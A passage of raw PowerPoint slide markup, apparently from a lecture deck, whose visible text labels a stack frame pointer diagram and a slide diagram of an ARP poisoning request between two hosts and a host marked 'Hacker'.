            <a:ext cx="2248116" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Current Frame Pointer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(stack pointer)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="457200" y="4572000"/>
            <a:ext cx="1219200" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">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33" name="Freeform 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5239209" flipH="1">
            <a:off x="5783395" y="1547611"/>
            <a:ext cx="1289400" cy="2740502"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 437321"/>
              <a:gd name="connsiteY0" fmla="*/ 2080591 h 2080591"/>
              <a:gd name="connsiteX1" fmla="*/ 424069 w 437321"/>
              <a:gd name="connsiteY1" fmla="*/ 940904 h 2080591"/>
              <a:gd name="connsiteX2" fmla="*/ 79513 w 437321"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2080591"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0" y="connsiteY0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1" y="connsiteY1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2" y="connsiteY2"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="437321" h="2080591">
                <a:moveTo>
                  <a:pt x="0" y="2080591"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="205408" y="1684130"/>
                  <a:pt x="410817" y="1287669"/>
                  <a:pt x="424069" y="940904"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="437321" y="594139"/>
                  <a:pt x="258417" y="297069"/>
                  <a:pt x="79513" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="31750" cap="rnd" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="oval" w="med" len="med"/>
            <a:tailEnd type="stealth" w="lg" len="lg"/>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1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30"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7</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="6245225"/>
            <a:ext cx="2133600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105475" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="6245225"/>
            <a:ext cx="2895600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F21FF204-F837-485F-97C9-5FF6216BF75F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225282" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="304800"/>
            <a:ext cx="8915400" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" rtl="0" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" smtClean="0">
                <a:latin typeface="Algerian" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>ARP Poisoning--Response to a Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="1447800"/>
            <a:ext cx="5562600" cy="1965325"/>
            <a:chOff x="1392" y="912"/>
            <a:chExt cx="3504" cy="1238"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="105503" name="Picture 4"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="912"/>
              <a:ext cx="768" cy="870"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="105504" name="Picture 5"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4128" y="912"/>
              <a:ext cx="768" cy="870"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105505" name="Line 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2064" y="1584"/>
              <a:ext cx="2160" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105506" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1487" y="1824"/>
              <a:ext cx="536" cy="326"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Host A</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>10.10.0.1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105507" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4315" y="1824"/>
              <a:ext cx="536" cy="326"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Host B</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>10.10.0.2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="105479" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="4800600"/>
            <a:ext cx="1162050" cy="1362075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105480" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2382838" y="6248400"/>
            <a:ext cx="1360487" cy="517525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Host C (Hacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>10.10.0.2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2514600"/>
            <a:ext cx="1676400" cy="3276600"/>
            <a:chOff x="2112" y="1584"/>
            <a:chExt cx="1056" cy="2064"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105501" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3168" y="1584"/>
              <a:ext cx="0" cy="2064"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105502" name="Line 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2112" y="3648"/>
              <a:ext cx="1056" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105482" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6248400" y="4953000"/>
            <a:ext cx="184150" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105483" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6232525" y="4989513"/>
            <a:ext cx="184150" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 16"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="1695450"/>
            <a:ext cx="3276600" cy="4019550"/>
            <a:chOff x="2112" y="1068"/>
            <a:chExt cx="2064" cy="2532"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105496" name="Line 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2112" y="1488"/>
              <a:ext cx="2064" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="5" name="Group 18"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2208" y="1488"/>
              <a:ext cx="768" cy="2112"/>
              <a:chOff x="2208" y="1488"/>
              <a:chExt cx="768" cy="2112"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="105499" name="Line 19"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2976" y="1488"/>
                <a:ext cx="0" cy="2112"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="105500" name="Line 20"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2208" y="3600"/>
                <a:ext cx="768" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd type="triangle" w="med" len="med"/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105498" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2451" y="1068"/>
              <a:ext cx="1114" cy="372"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="hlink"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Who has 10.10.0.2</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="hlink"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>My IP is 10.10.0.1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 22"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="3494088"/>
            <a:ext cx="2590800" cy="468312"/>
            <a:chOff x="1392" y="2454"/>
            <a:chExt cx="1632" cy="295"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="225303" name="Rectangle 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1968" y="2454"/>
              <a:ext cx="1056" cy="295"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="800000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="hlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="800000"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000"/>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>??-??-??-??-??-??</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="225304" name="Rectangle 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2454"/>
              <a:ext cx="576" cy="295"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="800000"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="hlink"/>
                </a:buClr>
                <a:buSzPct val="80000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="800000"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000"/>
                    </a:outerShdw>
                  </a:effectLst>
                </a:rPr>
                <a:t>10.10.0.2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 25"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="2743200"/>
            <a:ext cx="4729163" cy="1136650"/>
            <a:chOff x="2160" y="1728"/>
            <a:chExt cx="2979" cy="716"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105492" name="Line 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2160" y="1728"/>
              <a:ext cx="2064" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="triangle" w="med" len="med"/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105493" name="Text Box 27"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3456" y="2112"/>
              <a:ext cx="1683" cy="332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
